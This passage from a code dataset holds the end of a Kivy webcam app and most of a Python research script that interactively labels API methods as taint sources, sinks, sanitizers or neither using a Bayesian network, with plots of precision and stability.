code. Just copied & pasted\n\n def start(self):\n \"\"\"Starts the camera and changes the Button text\"\"\"\n self.ids.camera.play = True\n self.ids.camera.texture = self.ids.camera._camera.texture\n self.ids.camera.opacity = 1\n\n def stop(self):\n \"\"\"Stops the camera and changes the button text\"\"\"\n self.ids.camera.play = False\n self.ids.camera.texture = None\n self.ids.camera.opacity = 0\n\n\n def capture(self):\n \"\"\"Creates a unique file path with the current timestamp in the files dir\"\"\"\n self.file_path = \"files/\" + time.strftime(\"%Y%m%d-%H%M%S\") + \".png\"\n self.ids.camera.export_to_png(self.file_path)\n self.manager.current = \"image_screen\"\n self.manager.current_screen.ids.img.source = self.file_path\n\nclass ImageScreen(Screen):\n link_error_message = \"Generate a URl first!\"\n def create_link(self):\n \"\"\"Accesses the photo filepath, uploads it to the web and inserts the link\n in the Label widget\"\"\"\n # filepath = App.get_running_app().root.ids.camera_screen.filepath\n # filesharer = FileSharer(filepath=filepath)\n self.url = \"www.google.com\"\n self.ids.link.text = \"Filestack currently unavailable\"\n\n def copy_link(self):\n \"\"\"Copy link into the clipboard available for posting\"\"\"\n try:\n Clipboard.copy(self.url)\n except:\n self.ids.link.text = self.link_error_message\n\n def open_link(self):\n \"\"\"Open link with the default browser\"\"\"\n try:\n webbrowser.open(self.url)\n except:\n self.ids.link.text = self.link_error_message\n\n\nclass RootWidget(ScreenManager):\n pass\n\n\nclass MainApp(App):\n\n def build(self):\n return RootWidget()\n\n\nMainApp().run()\n\n\n","repo_name":"selimcanpolat/webcam-photo-sharer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74798458668","text":"import csv\nimport itertools as it\nimport json\nimport os\nimport os.path\nimport random\nimport time\nimport glob\nimport argparse\nimport re\n\nimport make_BN\nimport matplotlib.axes as axes\nimport matplotlib.patches as ptch\nimport matplotlib.pyplot as plt\nimport modin.pandas as pd\nimport networkx as nx\nimport numpy as np\nimport transfer_knowledge\nimport deal_with_poor_nodes\n\nfrom datetime import datetime\nfrom create_node import process\nfrom make_CPT import *\nfrom make_underlying_graph import call_reader, df_reader, find_edge_labels\nfrom matplotlib.ticker import MaxNLocator\nfrom pomegranate import *\nfrom scrape_oracle_docs import *\nfrom toolz import valmap\nfrom functools import reduce\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"solution_file\", help=\"path to the solution file. input 'None' if you don't have any.\",\n type=str)\nargs = parser.parse_args()\n\n# Constants ========================================\n# ==================================================\n\ndef retrieve_path():\n \"\"\"paths.json을 읽고 path를 가져온다.\"\"\"\n with open(\"paths.json\", \"r+\") as pathjson:\n pathdict = json.load(pathjson)\n return pathdict[\"project_root_directory\"]\n\nPROJECT_ROOT_DIR = retrieve_path()\n\nif args.solution_file != \"None\":\n with open(args.solution_file, \"r+\") as solution_file:\n SOLUTION = json.load(solution_file)\nelse:\n SOLUTION = None\n\nNOW = datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")\nDF_EDGES = list(df_reader)\nCALL_EDGES = list(call_reader)\n\nWINDOW_SIZE = 4\nGLOBAL_GRAPH = nx.read_gpickle(\"graph_for_reference\")\nTOTAL_NUM_OF_METHS = GLOBAL_GRAPH.number_of_nodes()\n\nwith open(PROJECT_ROOT_DIR+\"skip_func.txt\", \"r+\") as skip_func:\n skip_funcs = skip_func.readlines()\n skip_funcs = list(map(lambda string: string.rstrip(), skip_funcs))\n\n\n# TODO skip_func만 물어보도록 guide하기\n\n\n# Random loop ========================================\n# ====================================================\n\ndef random_loop(global_precision_list, snapshot_dict, BN_for_inference, graph_for_reference,\n interaction_number, current_asked, current_evidence, prev_snapshot,\n precision_list, stability_list, precision_inferred_list,\n loop_time_list, window, graph_file):\n \"\"\"The main interaction functionality, asking randomly\n Parameters:\n - BN_for_inference: the Bayesian Network.\n - graph_for_reference: the underlying graph.\n - interaction_number: number of interactions performed so far.\n - current_asked: names of currently asked nodes.\n - current_evidence: dict of given evidences accumulated so far\n - prev_snapshot: snapshot from the previous call\n - precision_list: accumulated precision values\n - stability_list: accumulated stability values\n - precision_inferred_list: accumulated precision values purely inferred by the BN\n - loop_time_list: accumulated times took in belief propagation\n - window: sliding window with size 4\"\"\"\n\n loop_start = time.time()\n\n random_index = random.randint(0, len(BN_for_inference.states)-1)\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n num_of_states = len(state_names)\n query = state_names[random_index]\n while query in current_asked:\n random_index = random.randint(0, len(BN_for_inference.states)-1)\n query = BN_for_inference.states[random_index].name\n\n its_time_to_terminate = time_to_terminate(BN_for_inference, current_evidence)\n\n # exit the function based on confidence.\n if its_time_to_terminate:\n save_data_as_csv(prev_snapshot, state_names)\n return (prev_snapshot, precision_list, stability_list,\n precision_inferred_list, current_asked, global_precision_list)\n\n oracle_response = input(\"What label does <\" + query + \"> bear? [src|sin|san|non]: \")\n\n if oracle_response == 'src':\n current_evidence[query] = 1\n elif oracle_response == 'sin':\n current_evidence[query] = 2\n elif oracle_response == 'san':\n current_evidence[query] = 3\n elif oracle_response == 'non':\n current_evidence[query] = 4\n elif oracle_response == 'exit':\n if SOLUTION is not None:\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_states, \"random\", interactive=False)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_states, \"random\", interactive=False)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_states, \"random\", interactive=False)\n save_data_as_csv(prev_snapshot, state_names)\n return prev_snapshot, precision_list, stability_list, precision_inferred_list\n\n current_asked.append(query)\n\n # the new snapshot after the observation and its inference time\n new_raw_snapshot = BN_for_inference.predict_proba(current_evidence, n_jobs=-1)\n new_snapshot = make_names_and_params(state_names, new_raw_snapshot)\n\n if SOLUTION:\n # update the snapshot_dict\n snapshot_dict[graph_file] = new_snapshot\n global_precision = evaluate_global_precision(snapshot_dict)\n global_precision_list.append(global_precision)\n\n # the new precision after the observation\n current_precision = calculate_precision(state_names, new_snapshot)\n precision_list[interaction_number] = current_precision\n\n # the new stability after the observation\n current_stability = calculate_stability(state_names, prev_snapshot, new_snapshot)\n stability_list[interaction_number] = current_stability\n\n # the new precision purely inferred by the BN, after the observation\n current_precision_inferred = calculate_precision_inferred(state_names, new_snapshot, interaction_number)\n precision_inferred_list[interaction_number] = current_precision_inferred\n\n # slide the window\n window = window[1:] # dequeue the oldest one\n window.append(new_snapshot) # and enqueue the newest one\n\n # record this loop's looping time\n loop_time_list.append(time.time()-loop_start)\n\n # visualize the current status if necessary\n if SOLUTION:\n visualize_snapshot(state_names, graph_for_reference, new_snapshot, [])\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_states, \"random\", interactive=True)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_states, \"random\", interactive=True,)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_states, \"random\", interactive=True)\n\n # loop!\n return random_loop(global_precision_list, snapshot_dict, BN_for_inference, graph_for_reference,\n interaction_number+1, current_asked, current_evidence, new_snapshot,\n precision_list, stability_list, precision_inferred_list,\n loop_time_list, window, graph_file)\n\n\n# tactical loop and its calculations =====================\n# ========================================================\n\ndef tactical_loop(global_precision_list, snapshot_dict, graph_for_reference, BN_for_inference,\n interaction_number, current_asked, current_evidence, updated_nodes,\n prev_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, window, graph_file):\n \"\"\"the main interaction functionality (loops via recursion), asking tactically using d-separation\n parameters:\n - graph_for_reference: the underlying graph.\n - interaction_number: number of interactions performed so far.\n - current_asked: names of currently asked nodes.\n - current_evidence: dict of given evidences accumulated so far\n - updated_nodes: updated nodes which are currently being tracked of\n - prev_snapshot: snapshot from the previous call\n - precision_list: accumulated precision values\n - stability_list: accumulated stability values\n - precision_inferred_list: accumulated precision values purely inferred by the BN\n - loop_time_list: accumulated times took in belief propagation\n - window: sliding window with size 4\"\"\"\n\n loop_start = time.time()\n\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n APIs = list(filter(lambda node: node in skip_funcs, state_names))\n\n num_of_states = len(state_names)\n num_of_APIs = len(APIs)\n\n # some variables to make our code resemble English\n there_are_nodes_left = find_max_d_con(graph_for_reference, BN_for_inference, current_asked,\n updated_nodes, APIs)\n there_are_no_nodes_left = not there_are_nodes_left\n its_time_to_terminate = time_to_terminate(BN_for_inference, current_evidence, window, criteria='plateau')\n not_yet_time_to_terminate = not its_time_to_terminate\n\n # pick a method to ask by finding one with the maximum number of D-connected nodes\n if there_are_no_nodes_left:\n query = None\n dependent_nodes = []\n else:\n query = there_are_nodes_left[0]\n dependent_nodes = there_are_nodes_left[1]\n\n # exit the function based on various termination measures.\n if there_are_no_nodes_left and not_yet_time_to_terminate:\n if set(state_names) == set(current_asked):\n print(\"\\nWarning: some distributions are not fully determined.\\n\")\n if SOLUTION:\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_APIs, \"tactical\", interactive=False)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_APIs, \"tactical\", interactive=False)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_APIs, \"tactical\", interactive=False)\n save_data_as_csv(state_names, prev_snapshot)\n return (prev_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, current_asked,\n global_precision_list)\n else:\n query, dependent_nodes = find_max_d_con(graph_for_reference, BN_for_inference,\n [], [], remove_sublist(state_names, current_asked))\n elif there_are_no_nodes_left and its_time_to_terminate:\n if SOLUTION:\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_APIs, \"tactical\", interactive=False)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_APIs, \"tactical\", interactive=False)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_APIs, \"tactical\", interactive=False)\n save_data_as_csv(state_names, prev_snapshot)\n return (prev_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, current_asked,\n global_precision_list)\n elif there_are_nodes_left and not_yet_time_to_terminate:\n pass\n elif there_are_nodes_left and its_time_to_terminate:\n save_data_as_csv(state_names, prev_snapshot)\n return (prev_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, current_asked,\n global_precision_list)\n\n # ask the chosen method and fetch the answer from the solutions\n oracle_response = input(\"What label does <\" + query + \"> bear? [src|sin|san|non]: \")\n updated_nodes += list(d_connected(graph_for_reference, BN_for_inference,\n query, current_asked, APIs))\n\n if oracle_response == 'src':\n current_evidence[query] = 1\n elif oracle_response == 'sin':\n current_evidence[query] = 2\n elif oracle_response == 'san':\n current_evidence[query] = 3\n elif oracle_response == 'non':\n current_evidence[query] = 4\n elif oracle_response == 'exit':\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_states, \"tactical\", interactive=False)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_states, \"tactical\", interactive=False)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_states, \"tactical\", interactive=False)\n return (prev_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, current_asked,\n global_precision_list)\n\n current_asked.append(query)\n\n # the new snapshot after the observation\n new_raw_snapshot = BN_for_inference.predict_proba(current_evidence, n_jobs=-1)\n new_snapshot = make_names_and_params(APIs, new_raw_snapshot)\n\n if SOLUTION:\n # update the snapshot_dict\n snapshot_dict[graph_file] = new_snapshot\n global_precision = evaluate_global_precision(snapshot_dict)\n global_precision_list.append(global_precision)\n\n # the new precision after the observation\n current_precision = calculate_precision(APIs, new_snapshot)\n precision_list[interaction_number] = current_precision\n\n # the new stability after the observation\n current_stability = calculate_stability(APIs, prev_snapshot, new_snapshot)\n stability_list[interaction_number] = current_stability\n\n # the new precision purely inferred by the BN, after the observation\n current_precision_inferred = calculate_precision_inferred(APIs, new_snapshot,\n interaction_number)\n precision_inferred_list[interaction_number] = current_precision_inferred\n\n # slide the window\n window = window[1:] # dequeue the oldest one\n window.append(new_snapshot) # and enqueue the newest one\n\n # record this loop's looping time\n loop_time_list.append(time.time()-loop_start)\n\n # visualize the current status if necessary\n if SOLUTION:\n visualize_snapshot(state_names, graph_for_reference, new_snapshot, [])\n draw_precision_graph(graph_file, list(range(1, num_of_APIs+1)),\n precision_list, num_of_states, \"tactical\", interactive=True)\n draw_stability_graph(graph_file, list(range(1, num_of_APIs+1)),\n stability_list, num_of_states, \"tactical\", interactive=True)\n draw_precision_inferred_graph(graph_file, list(range(1, num_of_APIs+1)),\n precision_inferred_list, num_of_states, \"tactical\", interactive=True)\n\n # loop!\n return tactical_loop(global_precision_list, snapshot_dict, graph_for_reference, BN_for_inference,\n interaction_number+1, current_asked, current_evidence, updated_nodes,\n new_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, window, graph_file)\n\n\ndef d_connected(graph_for_reference, BN_for_inference, node, current_asked, pool):\n \"\"\"현재까지 물어본 노드들이 주어졌을 때, node와 조건부 독립인 노드들의 set을 찾아낸다. Complexity: O(n).\"\"\"\n out = set()\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n for other_node in state_names:\n if nx.d_separated(graph_for_reference, {node}, {other_node}, set(current_asked)):\n out.add(other_node)\n return set(state_names) - out\n\n\ndef remove_sublist(lst, sublst):\n \"\"\"remove the sublst from lst without any side-effect.\"\"\"\n out = []\n for elem in lst:\n if elem not in sublst:\n out.append(elem)\n return out\n\n\ndef forall(unary_pred, collection):\n return reduce(lambda acc, elem: unary_pred(elem) and acc, collection, True)\n\n\ndef find_max_d_con(graph_for_reference, BN_for_inference,\n current_asked, updated_nodes, list_of_all_nodes):\n \"\"\"가장 d-connected 노드가 많은 노드를 리턴한다. 더 이상 고를 수 있는 노드가 없다면 None을 리턴한다.\"\"\"\n node_dataframe = pd.DataFrame(list_of_all_nodes, columns=['nodes'])\n mapfunc = lambda row: len(d_connected(graph_for_reference, BN_for_inference,\n row['nodes'], current_asked,\n list_of_all_nodes)-set(current_asked)-set(updated_nodes))\n d_con_set_len = node_dataframe.apply(mapfunc, axis=1)\n if d_con_set_len.mask(d_con_set_len == 0).dropna().empty:\n return None\n node_dataframe[\"d_con_set_len\"] = d_con_set_len\n node_dataframe.sort_values(by=[\"d_con_set_len\"], inplace=True, ascending=False)\n return node_dataframe.iloc[0].nodes, node_dataframe.iloc[0].d_con_set_len\n\n\ndef is_confident(parameters):\n \"\"\"확률분포 (Distribution 오브젝트의 parameters 부분)를 보고,\n 가장 높은 확률이 다른 확률들보다 적어도 0.1은 높은지 확인한다.\"\"\"\n if type(parameters) == dict:\n parameters = list(parameters.values())\n first_rank = max(parameters)\n parameters_ = parameters[:]\n parameters_.remove(first_rank)\n second_rank = max(parameters_)\n return first_rank - second_rank < 0.05\n\n\ndef time_to_terminate(BN_for_inference, current_evidence, window, **kwargs):\n \"\"\"determine if it's time to terminate, based on different measures\n - Available kwargs:\n - 'plateau': terminate loop if the precision seems to be plateauing\n - 'confidence': terminate loop if all nodes' are confidently updated\"\"\"\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n if kwargs['criteria'] == 'confidence':\n # the distribution across random variables' values\n snapshot = BN_for_inference.predict_proba(current_evidence, n_jobs=-1)\n names_and_params = make_names_and_params(state_names, snapshot)\n params = list(map(lambda tup: tup[1], names_and_params))\n # list of lists of the probabilities across random variables' values, extracted from dist_dicts\n dist_probs = list(map(lambda distobj: list(distobj.values()), params))\n # Do all the nodes' probability lists satisfy is_confident()?\n return reduce(lambda acc, lst: is_confident(lst) and acc, dist_probs, True)\n elif kwargs['criteria'] == 'plateau':\n # take a look at the contents of the window\n acc = ()\n for snapshot in window:\n params = list(map(lambda tup: tup[1], snapshot))\n names_and_labels = list(map(lambda tup: (tup[0], find_max_val(tup[1])), snapshot))\n acc += (names_and_labels,)\n\n a, b, c, d = acc\n\n initial = np.ndarray([0])\n\n all_4_are_equal = np.array_equal(a, b) and np.array_equal(b, c) and np.array_equal(c, d)\n\n any_of_4_are_initial = np.array_equal(a, initial) or\\\n np.array_equal(b, initial) or\\\n np.array_equal(c, initial) or\\\n np.array_equal(d, initial)\n\n there_is_a_pothole = (np.array_equal(a, c) and not np.array_equal(a, b) or\\\n np.array_equal(a, d) and not np.array_equal(c, d)) and\\\n not np.array_equal(a, initial) and\\\n not np.array_equal(c, initial) and\\\n not np.array_equal(d, initial)\n\n if all_4_are_equal and not any_of_4_are_initial:\n return True\n elif there_is_a_pothole:\n return True\n else:\n return False\n\n\ndef count_confident_nodes(state_names, snapshot):\n # the distribution across random variables' values\n names_and_params = make_names_and_params(state_names, snapshot)\n params = list(map(lambda tup: tup[1], names_and_params))\n # list of lists of the probabilities across random variables' values, extracted from dist_dicts\n dist_probs = list(map(lambda dist: list(dist.values()), params))\n # Do all the nodes' probability lists satisfy is_confident()?\n acc = 0\n for lst in dist_probs:\n if is_confident(lst):\n acc += 1\n return acc\n\n\ndef normalize_dist(oracle_response):\n \"\"\"*int로 주어진* oracle_response에 따라 4-nomial distribution을 만든다.\"\"\"\n if oracle_response == 1:\n return {1.0: 1, 2.0: 0, 3.0: 0, 4.0: 0}\n elif oracle_response == 2:\n return {1.0: 0, 2.0: 1, 3.0: 0, 4.0: 0}\n elif oracle_response == 3:\n return {1.0: 0, 2.0: 0, 3.0: 1, 4.0: 0}\n elif oracle_response == 4:\n return {1.0: 0, 2.0: 0, 3.0: 0, 4.0: 1}\n\n\ndef find_max_val(stats):\n max_key = max(stats, key=lambda key: stats[key])\n if max_key == 1.0:\n return \"src\"\n elif max_key == 2.0:\n return \"sin\"\n elif max_key == 3.0:\n return \"san\"\n elif max_key == 4.0:\n return \"non\"\n\n\n# visualizing functions and their dependencies ============\n# =========================================================\n\nnode_colordict = {\"src\": \"red\", \"sin\": \"orange\", \"san\": \"yellow\", \"non\": \"green\"}\n\ndef visualize_snapshot(state_names, graph_for_reference, snapshot, dependent_nodes):\n \"\"\"한번 iteration 돌 때마다, 전체 BN의 snapshot을 가시화한다. 이 때, confident node들 위에는 `conf`라는 문구를 띄운다.\"\"\"\n network_figure = plt.figure(\"Bayesian Network\", figsize=(30, 15))\n network_figure.clf()\n plt.ion()\n ax = network_figure.add_subplot()\n params = list(map(lambda tup: tup[1], snapshot))\n names_and_labels = list(map(lambda tup: (tup[0], find_max_val(tup[1])), snapshot))\n node_colormap = create_node_colormap(state_names, names_and_labels)\n edge_colormap = create_edge_colormap(graph_for_reference)\n\n node_posmap = nx.circular_layout(graph_for_reference)\n\n # confident node들 위에 문구 띄우기\n confident_node_indices = []\n for i, param in enumerate(params):\n if is_confident(param):\n confident_node_indices.append(i)\n confident_nodes = list(map(lambda index: snapshot[index][0], confident_node_indices))\n for confident_node in confident_nodes:\n x, y = node_posmap[confident_node]\n plt.text(x, y+0.1, s='conf', bbox=dict(facecolor='blue', alpha=0.5), horizontalalignment='center')\n\n for node_name in list(graph_for_reference.nodes):\n if node_name not in state_names:\n graph_for_reference.remove_node(node_name)\n\n nx.draw(graph_for_reference,\n node_color=node_colormap, edge_color=edge_colormap,\n pos=node_posmap,\n ax=ax,\n with_labels=True, node_size=100)\n\n plt.show()\n\n\ndef draw_precision_graph(graph_file, x, y, num_of_states, loop_type, interactive=True):\n \"\"\"precision graph를 그리는 함수. NOTE: x와 y의 input 길이를 맞춰줘야 함.\n Available kwargs:\n - interactive [True|False]: Interactively show & update vs. save as png file\"\"\"\n plt.ion()\n precision_figure = plt.figure(\"Precision\")\n ax = precision_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n precision_figure.clf()\n plt.xlim(1, num_of_states)\n plt.ylim(0, num_of_states)\n plt.xlabel('# of interactions')\n plt.ylabel('# of correct nodes')\n plt.title(\"Precision development during interaction (\"+loop_type+\")\")\n plt.plot(x, y, 'b-')\n if interactive:\n precision_figure.canvas.draw()\n else:\n if not os.path.isdir(graph_file+\"_stats\"):\n os.mkdir(graph_file+\"_stats\")\n plt.savefig(graph_file+\"_stats\"+os.sep+\\\n \"precision_graph_\"+NOW+\"_\"+loop_type+\".png\")\n\n\ndef draw_stability_graph(graph_file, x, y, num_of_states, loop_type, interactive=True):\n \"\"\"stability graph를 그리는 함수. NOTE: x와 y의 input 길이를 맞춰줘야 함.\n Available kwargs:\n - interactive [True|False]: Interactively show & update vs. save as png file\"\"\"\n plt.ion()\n stability_figure = plt.figure(\"Stability\")\n ax = stability_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n stability_figure.clf()\n plt.xlim(1, num_of_states)\n plt.ylim(0, num_of_states)\n plt.xlabel(\"# of interactions\")\n plt.ylabel('# of changed nodes')\n plt.title(\"Stability development during interaction (\"+loop_type+\")\")\n plt.plot(x, y, 'b-')\n if interactive:\n stability_figure.canvas.draw()\n else:\n if not os.path.isdir(graph_file+\"_stats\"):\n os.mkdir(graph_file+\"_stats\")\n plt.savefig(graph_file+\"_stats\"+os.sep+\\\n \"stability_graph_\"+NOW+\"_\"+loop_type+\".png\")\n\n\ndef draw_precision_inferred_graph(graph_file, x, y, num_of_states, loop_type, interactive=True):\n \"\"\"순수하게 BN이 추론해서 맞힌 노드의 개수에 대한 그래프를 그리는 함수. NOTE: x와 y의 input 길이를 맞춰줘야 함.\n Available kwargs:\n - interactive [True|False]: Interactively show & update vs. save as png file\"\"\"\n plt.ion()\n precision_inferred_figure = plt.figure(\"Inferred Precision\")\n ax = precision_inferred_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n precision_inferred_figure.clf()\n plt.xlim(1, num_of_states)\n plt.ylim(0, num_of_states)\n plt.xlabel(\"# of interactions\")\n plt.ylabel('# of correctly inferred nodes')\n plt.title(\"Inferred precision development during interaction (\"+loop_type+\")\")\n plt.plot(x, y, 'b-')\n if interactive:\n precision_inferred_figure.canvas.draw()\n else:\n if not os.path.isdir(graph_file+\"_stats\"):\n os.mkdir(graph_file+\"_stats\")\n plt.savefig(graph_file+\"_stats\"+os.sep+\\\n \"precision_inferred_graph_\"+NOW+\"_\"+loop_type+\".png\")\n\n\ndef draw_n_save(graph_file, BN_for_inference, precision_list, stability_list, precision_inferred_list, **kwargs):\n \"\"\"available kwargs: random, tactical\"\"\"\n interaction_number = len(precision_list)\n\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n num_of_states = len(state_names)\n\n draw_precision_graph(graph_file, range(interaction_number),\n precision_list, num_of_states, kwargs[\"loop_type\"])\n draw_stability_graph(graph_file, range(interaction_number),\n stability_list, num_of_states, kwargs[\"loop_type\"])\n draw_precision_inferred_graph(graph_file, range(interaction_number),\n precision_inferred_list, num_of_states, kwargs[\"loop_type\"])\n\n\ndef create_node_colormap(state_names, names_and_labels):\n \"\"\"BN을 기준으로 계산된 names_and_labels를 받아서 graph_for_reference를 기준으로 한 colormap을 만든다.\"\"\"\n out = list(state_names)[:]\n for name, label in names_and_labels:\n index = out.index(name)\n out[index] = node_colordict[label]\n return out\n\n\ndef create_edge_colormap(graph_for_reference):\n \"\"\"엣지 목록을 받아서, 엣지의 종류에 따라 graph_for_reference를 그릴 때 엣지의 색깔을 달리한다.\"\"\"\n out = list(graph_for_reference.edges)[:]\n for edge in out:\n index = out.index(edge)\n if edge in DF_EDGES: # df\n out[index] = \"red\"\n elif edge in CALL_EDGES: # call\n out[index] = \"green\"\n else: # sim\n out[index] = \"blue\"\n return out\n\n\ndef make_names_and_params(state_names, snapshot):\n \"\"\"snapshot을 읽어서, 랜덤변수 별 확률값의 dict인 parameters만을 빼낸 다음 node의 이름과 짝지어서 list에 담아 낸다.\"\"\"\n distobjs = []\n for distobj in snapshot:\n if type(distobj) == int or type(distobj) == float: # oracle에 의해 고정된 경우!\n distobjs.append(normalize_dist(distobj))\n else:\n distobjs.append(distobj.parameters[0])\n names_and_params = list(zip(state_names, distobjs))\n return names_and_params\n\n\ndef report_results(state_names, initial_snapshot, final_snapshot):\n names_and_dists_initial = make_names_and_params(state_names, initial_snapshot)\n names_and_labels_initial = list(map(lambda tup: (tup[0], find_max_val(tup[1])), names_and_dists_initial))\n\n names_and_dists_final = make_names_and_params(state_names, final_snapshot)\n names_and_labels_final = list(map(lambda tup: (tup[0], find_max_val(tup[1])), names_and_dists_final))\n\n for tup1, tup2 in zip(names_and_labels_initial, names_and_labels_final):\n # if the label has changed after interaction\n if tup1[1] != tup2[1]:\n print(tup1[0]+\" is updated from \"+tup1[1]+\" to \"+tup2[1])\n\n\ndef save_data_as_csv(state_names, final_snapshot):\n \"\"\"inference가 다 끝난 label들을 csv로 저장한다.\"\"\"\n names_and_labels_final = list(map(lambda tup: (tup[0], find_max_val(tup[1])), final_snapshot))\n out_df = pd.DataFrame(names_and_labels_final, columns=[\"name\", \"label\"])\n # append to the file if it exists\n out_df.to_csv(\"inferred.csv\", mode='a', header=not os.path.exists(\"inferred.csv\"))\n\n\ndef report_meta_statistics(graph_for_reference, BN_for_inference):\n \"\"\"meta-functionality for debugging\"\"\"\n print(\"# of nodes: \", len(list(BN_for_inference.states)))\n print(\"# of edges: \", len(list(BN_for_inference.edges)))\n\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n max_num_of_in_edges = max(list(map(lambda node: graph_for_reference.in_edges(nbunch=node), state_names)))\n max_num_of_out_edges = max(list(map(lambda node: graph_for_reference.out_edges(nbunch=node), state_names)))\n print(\"maximum # of in-edges:\", max_num_of_in_edges)\n print(\"maximum # of out-edges:\", max_num_of_out_edges)\n\n\n# Methods for calculating graph values ====================\n# =========================================================\n\ndef calculate_precision(state_names, current_snapshot):\n \"\"\"현재 확률분포 스냅샷의 정확도를 측정한다.\"\"\"\n names_and_labels = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), current_snapshot))\n correct_nodes = []\n for node_name in state_names:\n if names_and_labels[node_name] == SOLUTION[node_name]:\n correct_nodes.append(node_name)\n return len(correct_nodes)\n\n\ndef calculate_stability(state_names, prev_snapshot, current_snapshot):\n \"\"\"직전 확률분포 스냅샷에 대한 현재 확률분포 스냅샷의 stability를 측정한다.\n stability: time t에서의 stability: time (t-1)에서의 스냅샷과 비교했을 때 time t에서의 스냅샷에서 레이블이 달라진 노드의 개수.\"\"\"\n names_and_labels_prev = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), prev_snapshot))\n names_and_labels_current = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), current_snapshot))\n changed_nodes = []\n for node_name in names_and_labels_current.keys():\n if names_and_labels_prev[node_name] != names_and_labels_current[node_name]:\n changed_nodes.append(node_name)\n return len(changed_nodes)\n\n\ndef calculate_precision_inferred(state_names, current_snapshot, number_of_interaction):\n \"\"\"현재 확률분포 스냅샷을 보고, BN이 순수하게 infer한 것들 중에 맞힌 레이블의 개수를 구한다.\"\"\"\n # current_snapshot의 타입은? np.ndarray of Distribution.\n names_and_labels = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), current_snapshot))\n correct_nodes = []\n for node_name in state_names:\n if names_and_labels[node_name] == SOLUTION[node_name]:\n correct_nodes.append(node_name)\n return len(correct_nodes) - number_of_interaction\n\n\n# Finding graph files =====================================\n# =========================================================\n\ndef find_pickled_graphs():\n return list([f for f in os.listdir('.') if re.match(r'.*_graph_[0-9]+$', f)])\n\n# main ====================================================\n# =========================================================\n\ndef single_loop(snapshot_dict, graph_file, graph_for_reference,\n BN_for_inference, learned_evidence, **kwargs):\n \"\"\"do a random or tactical loop on a given graph file\n - Available kwargs:\n - loop_type ([random|tactical]): whether we should use random/tactical loop for looping.\"\"\"\n\n # the list of names of all states\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n\n # argument initialization\n initial_prediction_time = time.time()\n initial_raw_snapshot = BN_for_inference.predict_proba(learned_evidence, n_jobs=-1)\n initial_snapshot = make_names_and_params(state_names, initial_raw_snapshot)\n number_of_states = len(BN_for_inference.states)\n initial_precision_list = [np.nan for _ in range(len(BN_for_inference.states))]\n initial_stability_list = [np.nan for _ in range(len(BN_for_inference.states))]\n initial_precision_inferred_list = [np.nan for _ in range(len(BN_for_inference.states))]\n initial_window = [np.ndarray([0]) for _ in range(WINDOW_SIZE)]\n initial_asked = list(learned_evidence.keys())\n\n initial_updated_nodes = []\n for initial_query in initial_asked:\n initial_updated_nodes += list(set(d_connected(graph_for_reference, BN_for_inference,\n initial_query, initial_asked, state_names)))\n\n # random loop\n if kwargs[\"loop_type\"] == \"random\":\n (final_snapshot, precision_list, stability_list,\n precision_inferred_list, current_asked, global_precisions) =\\\n random_loop([], snapshot_dict, BN_for_inference, graph_for_reference, 0,\n initial_asked, learned_evidence, initial_snapshot,\n initial_precision_list, initial_stability_list,\n initial_precision_inferred_list, list(), list(), graph_file)\n\n draw_n_save(graph_file, precision_list, stability_list, initial_precision_inferred_list, loop_type='random')\n\n # tactical loop\n elif kwargs[\"loop_type\"] == \"tactical\":\n (final_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, current_asked,\n global_precisions) =\\\n tactical_loop([], snapshot_dict, graph_for_reference, BN_for_inference,\n 0, initial_asked, learned_evidence, 